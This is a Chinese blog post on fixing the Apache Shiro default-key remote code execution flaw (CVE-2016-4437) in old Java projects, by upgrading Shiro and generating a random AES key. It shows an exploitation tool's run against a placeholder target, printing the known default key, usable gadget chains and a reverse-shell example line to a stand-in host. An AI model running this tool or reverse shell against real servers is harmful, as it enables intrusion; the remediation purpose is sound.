Java项目中修复Apache Shiro 默认密钥致命令执行漏洞（CVE-2016-4437）详细说明

水深无声 2022-12-25 07:58 314阅读 0赞

**目录**

[1.漏洞说明][1.]

[1.1阿里云漏洞短信内容][1.1]

[1.2阿里云漏洞详细报告][1.2]

[2.详细修复步骤][2.]

[2.1下载漏洞验证工具][2.1]

[3.Java项目修改][3.Java]

[3.1修改前注意事项][3.1]

[3.2Jar包准备][3.2Jar]

[3.3增加一个自定义秘钥代码][3.3]

[3.4修改shiro配置][3.4_shiro]

[3.5修复后漏洞检测结果][3.5]

[4.常见问题][4.]

[ 4.1Unsupported major.minor version 52.0][4.1Unsupported major.minor version 52.0]

[4.2org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter报错][4.2org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter]

[4.3 java.lang.NoClassDefFoundError: org/owasp/encoder/Encode][4.3 java.lang.NoClassDefFoundError_ org_owasp_encoder_Encode]

--------------------

最近阿里云发了漏洞短信，需要在以后的老项目中修复漏洞，修复了6套Java项目，不同项目修复方式有所不同，特写此篇博客，以作备忘，欢迎大家留言讨论。

# 1.漏洞说明 #

## 1.1阿里云漏洞短信内容 ##

![c2c10b2de6eea0ded06975ca28b6733e.png][]

## 1.2阿里云漏洞详细报告 ##

![6992ccc78fba62500a340504d58d0cf0.png][]

![89cc3ef80a3351108ae141fc50450c4f.png][]

![73ba932609707893d900977f317ed569.png][]

# 2.详细修复步骤 #

## 2.1下载漏洞验证工具 ##

漏洞验证工具：https://github.com/wyzxxz/shiro\_rce，或者从[http://www.zrscsoft.com/sitepic/12120.html][http_www.zrscsoft.com_sitepic_12120.html]中下载

下载的shiro\_tool.jar文件，建设保存在D:\\download目录，即

![89a213698f21347c80557fd70b7d6672.png][]

根据阿里云漏洞报告，

执行D:\\work\\jdk1.8.0\\bin\\java.exe -jar shiro\_tool.jar http://\{您的IP地址\}命令，

具体如下：

> D:\\download>D:\\work\\jdk1.8.0\\bin\\java.exe -jar shiro\_tool.jar http://\{您的IP地址\}  
> \[-\] target: http://\{您的IP地址\}  
> \[-\] target is use shiro  
> \[-\] start guess shiro key...  
> \[-\] use shiro key: kPH+bIxk5D2deZiIxcaaaA==  
> \[-\] check CommonsBeanutils1  
> \[-\] check CommonsCollections1  
> \[-\] check CommonsCollections2  
> \[-\] check CommonsCollections3  
> \[-\] check CommonsCollections4  
> \[-\] check CommonsCollections5  
> \[-\] check CommonsCollections6  
> \[-\] check CommonsCollections7  
> \[-\] check CommonsCollections8  
> \[-\] check CommonsCollections9  
> \[-\] check CommonsCollections10  
> \[-\] check Groovy1  
> \[-\] check JSON1  
> \[-\] check Spring1  
> \[-\] check Spring2  
> \[-\] check Jdk7u21  
> \[-\] check JRMPClient  
> \[-\] check ROME  
> \[-\] check Clojure  
> \[\*\] find: CommonsCollections10 can be use  
> \[\*\] find: JRMPClient can be use  
> 0: CommonsCollections10  
> 1: JRMPClient  
> \[-\] please enter the number(0-1)  
> > 0  
> \[-\] use gadget: CommonsCollections10  
> \[\*\] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1 , command example: curl dnslog.xxx.com  
> \[\*\] if need base64 command, input should startwith bash=/powershell=/python=/perl=  
> \[-\] please enter command, enter q or quit to quit, enter back to re-choose gadget  
> > quit  
> \[-\] quit
> 
> D:\\download>

# 3.Java项目修改 #

## 3.1修改前注意事项 ##

shiro需要升级到1.7.0

shiro1.7.0的spring相关jar要求在4.0版本以上

spring4.0以上版本要求jdk1.8.0以上

## 3.2Jar包准备 ##

shiro1.7.0的jar如下：

> shiro-core-1.7.0.jar
> 
> shiro-ehcache-1.7.0.jar
> 
> shiro-spring-1.7.0.jar
> 
> shiro-web-1.7.0.jar

spring相关jar要求在4.0版本以上，这里建设更新到spring-5.2.10.RELEASE版本，

spring-5.2.10.RELEASE版本相关的jar，请参考[https://blog.csdn.net/jlq\_diligence/article/details/109771710][https_blog.csdn.net_jlq_diligence_article_details_109771710]博客，自行下载

我这边需要的jar大致如下，不同的项目有所不同

![dce075a7c139b7241732f9e8f3b62a86.png][]

## 3.3增加一个自定义秘钥代码 ##

参考官方的：org.apache.shiro.crypto.AbstractSymmetricCipherService\#generateNewKey()

> 1.  import org.apache.shiro.codec.Base64;
> 2.  import org.apache.shiro.crypto.AbstractSymmetricCipherService;
> 3.  import org.aspectj.apache.bcel.generic.IINC;
> 4.  
> 5.  import javax.crypto.KeyGenerator;
> 6.  import javax.crypto.SecretKey;
> 7.  
> 8.  import java.security.Key;
> 9.  import java.security.NoSuchAlgorithmException;
> 10. 
> 11. /\*\*
> 12. \* shiro 秘钥生成器
> 13. \*
> 14. \* @author admin shiro有自己的随机生成秘钥的方法 秘钥生成器
> 15. \*
> 16. \*
> 17. \*/
> 18. public class MySymmetricCipherService extends AbstractSymmetricCipherService \{
> 19. 
> 20. 
> 21. 
> 22. protected MySymmetricCipherService(String algorithmName) \{
> 23. super(algorithmName);
> 24. // TODO Auto-generated constructor stub
> 25. \}
> 26. 
> 27. public static byte\[\] generateNewKeyFromSuper() \{
> 28. KeyGenerator kg;
> 29. try \{
> 30. kg = KeyGenerator.getInstance("AES");
> 31. \} catch (NoSuchAlgorithmException var5) \{
> 32. String msg = "Unable to acquire AES algorithm. This is required to function.";
> 33. throw new IllegalStateException(msg, var5);
> 34. \}
> 35. 
> 36. kg.init(128);
> 37. SecretKey key = kg.generateKey();
> 38. byte\[\] encoded = key.getEncoded();
> 39. return encoded;
> 40. \}
> 41. 
> 42. 
> 43. 
> 44. /\*\*
> 45. \* 使用shiro官方的生成
> 46. \* org.apache.shiro.crypto.AbstractSymmetricCipherService\#generateNewKey()
> 47. \* @return
> 48. \*/
> 49. public static byte\[\] getCipherKey() \{
> 50. MySymmetricCipherService mySymmetricCipherService = new MySymmetricCipherService("AES");
> 51. Key gKey = mySymmetricCipherService.generateNewKey();
> 52. return gKey.getEncoded();
> 53. \}
> 54. 
> 55. public static void main(String\[\] args) \{
> 56. MySymmetricCipherService mySymmetricCipherService = new MySymmetricCipherService("AES");
> 57. Key gKey = mySymmetricCipherService.generateNewKey();
> 58. System.out.println("key: " + gKey.getEncoded());
> 59. System.out.println("key Base64.encodeToString: " + Base64.encodeToString(gKey.getEncoded()));
> 60. 
> 61. byte\[\] decodeValue = org.apache.shiro.codec.Base64.decode("t0EWNQWKMXYzKTDSQpNNfg==");
> 62. System.out.println("decodeValue: " + decodeValue);
> 63. \}
> 64. \}

## 3.4修改shiro配置 ##

例如shiro配置文件为spring-shiro.xml，不同项目，文件名有所不同，修改的位置，大致如下

>   
> <bean id="securityManager" class="org.apache.shiro.web.mgt.DefaultWebSecurityManager">  
> <property name="realm" ref="shiroDbRealm" />  
> <property name="cacheManager" ref="cacheManager" />  
>   
> <property name="rememberMeManager" ref="rememberMeManager" />  
> </bean>
> 
>   
>   
> <bean id="rememberMeManager" class="org.apache.shiro.web.mgt.CookieRememberMeManager">  
> <property name="cipherKey" value="\#\{T(com.\*\*.realm.MySymmetricCipherService).getCipherKey()\}" />  
> <property name="cookie" ref="rememberMeCookie" />  
> </bean>
> 
>   
> <bean id="rememberMeCookie" class="org.apache.shiro.web.servlet.SimpleCookie">  
> <constructor-arg value="rememberMe" />  
> <property name="httpOnly" value="true" />  
>   
> <property name="maxAge" value="604800" />  
> </bean>

## 3.5修复后漏洞检测结果 ##

![ece80b194b3c4501516a13bb551e28f2.png][]

# 4.常见问题 #

##  4.1Unsupported major.minor version 52.0 ##

【现象】

java.lang.UnsupportedClassVersionError: org/apache/shiro/crypto/AbstractSymmetricCipherService : Unsupported major.minor version 52.0  
at java.lang.ClassLoader.defineClass1(Native Method)  
at java.lang.ClassLoader.defineClass(ClassLoader.java:800)  
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)  
at java.net.URLClassLoader.defineClass(URLClassLoader.java:449)  
at java.net.URLClassLoader.access$100(URLClassLoader.java:71)  
at java.net.URLClassLoader$1.run(URLClassLoader.java:361)  
at java.net.URLClassLoader$1.run(URLClassLoader.java:355)  
at java.security.AccessController.doPrivileged(Native Method)  
at java.net.URLClassLoader.findClass(URLClassLoader.java:354)  
at java.lang.ClassLoader.loadClass(ClassLoader.java:425)  
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308)  
at java.lang.ClassLoader.loadClass(ClassLoader.java:358)

【解决方法】JDK更换为JDK1.8

详细描述如下：

当改变了jdk版本时，在编译java时，会遇到Unsupported major.minor version错误。  
jdk版本和stanford parser对应关系

JDK版本和Java编译器内部的版本号

J2SE 8 = 52,  
J2SE 7 = 51,  
J2SE 6.0 = 50,  
J2SE 5.0 = 49,  
JDK 1.4 = 48,  
JDK 1.3 = 47,  
JDK 1.2 = 46,  
JDK 1.1 = 45

## 4.2org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter报错 ##

【解决方法】

##    4.3 java.lang.NoClassDefFoundError: org/owasp/encoder/Encode ##

【现象】

java.lang.NoClassDefFoundError: org/owasp/encoder/Encode  
org.apache.shiro.web.filter.PathMatchingFilter.pathsMatch(PathMatchingFilter.java:134)  
org.apache.shiro.web.filter.PathMatchingFilter.preHandle(PathMatchingFilter.java:186)  
org.apache.shiro.web.servlet.AdviceFilter.doFilterInternal(AdviceFilter.java:131)  
org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)  
org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:66)  
org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:4  
【解决方法】  
添加 encoder-1.2.2.jar

详细操作和文件，可以参考[http://www.zrscsoft.com/sitepic/12120.html][http_www.zrscsoft.com_sitepic_12120.html]

[1.]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E6%BC%8F%E6%B4%9E%E8%AF%B4%E6%98%8E
[1.1]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E9%98%BF%E9%87%8C%E4%BA%91%E6%BC%8F%E6%B4%9E%E7%9F%AD%E4%BF%A1%E5%86%85%E5%AE%B9
[1.2]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E9%98%BF%E9%87%8C%E4%BA%91%E6%BC%8F%E6%B4%9E%E8%AF%A6%E7%BB%86%E6%8A%A5%E5%91%8A
[2.]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E8%AF%A6%E7%BB%86%E4%BF%AE%E5%A4%8D%E6%AD%A5%E9%AA%A4
[2.1]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E%E9%AA%8C%E8%AF%81%E5%B7%A5%E5%85%B7
[3.Java]: https://blog.csdn.net/jlq_diligence/article/details/109790614#Java%E9%A1%B9%E7%9B%AE%E4%BF%AE%E6%94%B9
[3.1]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E4%BF%AE%E6%94%B9%E5%89%8D%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9
[3.2Jar]: https://blog.csdn.net/jlq_diligence/article/details/109790614#Jar%E5%8C%85%E5%87%86%E5%A4%87
[3.3]: https://blog.csdn.net/jlq_diligence/article/details/109790614#2%E3%80%81%E5%A2%9E%E5%8A%A0%E4%B8%80%E4%B8%AA%E8%87%AA%E5%AE%9A%E4%B9%89%E7%A7%98%E9%92%A5%E4%BB%A3%E7%A0%81
[3.4_shiro]: https://blog.csdn.net/jlq_diligence/article/details/109790614#3%E3%80%81%E4%BF%AE%E6%94%B9shiro%E9%85%8D%E7%BD%AE
[3.5]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E4%BF%AE%E5%A4%8D%E5%90%8E%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B%E7%BB%93%E6%9E%9C
[4.]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98
[4.1Unsupported major.minor version 52.0]: https://blog.csdn.net/jlq_diligence/article/details/109790614#%C2%A0Unsupported%20major.minor%20version%2052.0
[4.2org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter]: https://blog.csdn.net/jlq_diligence/article/details/109790614#org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter%E6%8A%A5%E9%94%99
[4.3 java.lang.NoClassDefFoundError_ org_owasp_encoder_Encode]: https://blog.csdn.net/jlq_diligence/article/details/109790614#java.lang.NoClassDefFoundError%3A%20org%2Fowasp%2Fencoder%2FEncode
[c2c10b2de6eea0ded06975ca28b6733e.png]: /images/20221120/22582969e3e44872924bc28733ca59c3.png
[6992ccc78fba62500a340504d58d0cf0.png]: /images/20221120/a5b10f26fd8b435fa7127eb762bd0fc4.png
[89cc3ef80a3351108ae141fc50450c4f.png]: https://img-blog.csdnimg.cn/img_convert/89cc3ef80a3351108ae141fc50450c4f.png
[73ba932609707893d900977f317ed569.png]: https://img-blog.csdnimg.cn/img_convert/73ba932609707893d900977f317ed569.png
[http_www.zrscsoft.com_sitepic_12120.html]: http://www.zrscsoft.com/sitepic/12120.html
[89a213698f21347c80557fd70b7d6672.png]: https://img-blog.csdnimg.cn/img_convert/89a213698f21347c80557fd70b7d6672.png
[https_blog.csdn.net_jlq_diligence_article_details_109771710]: https://blog.csdn.net/jlq_diligence/article/details/109771710
[dce075a7c139b7241732f9e8f3b62a86.png]: https://img-blog.csdnimg.cn/img_convert/dce075a7c139b7241732f9e8f3b62a86.png
[ece80b194b3c4501516a13bb551e28f2.png]: https://img-blog.csdnimg.cn/img_convert/ece80b194b3c4501516a13bb551e28f2.png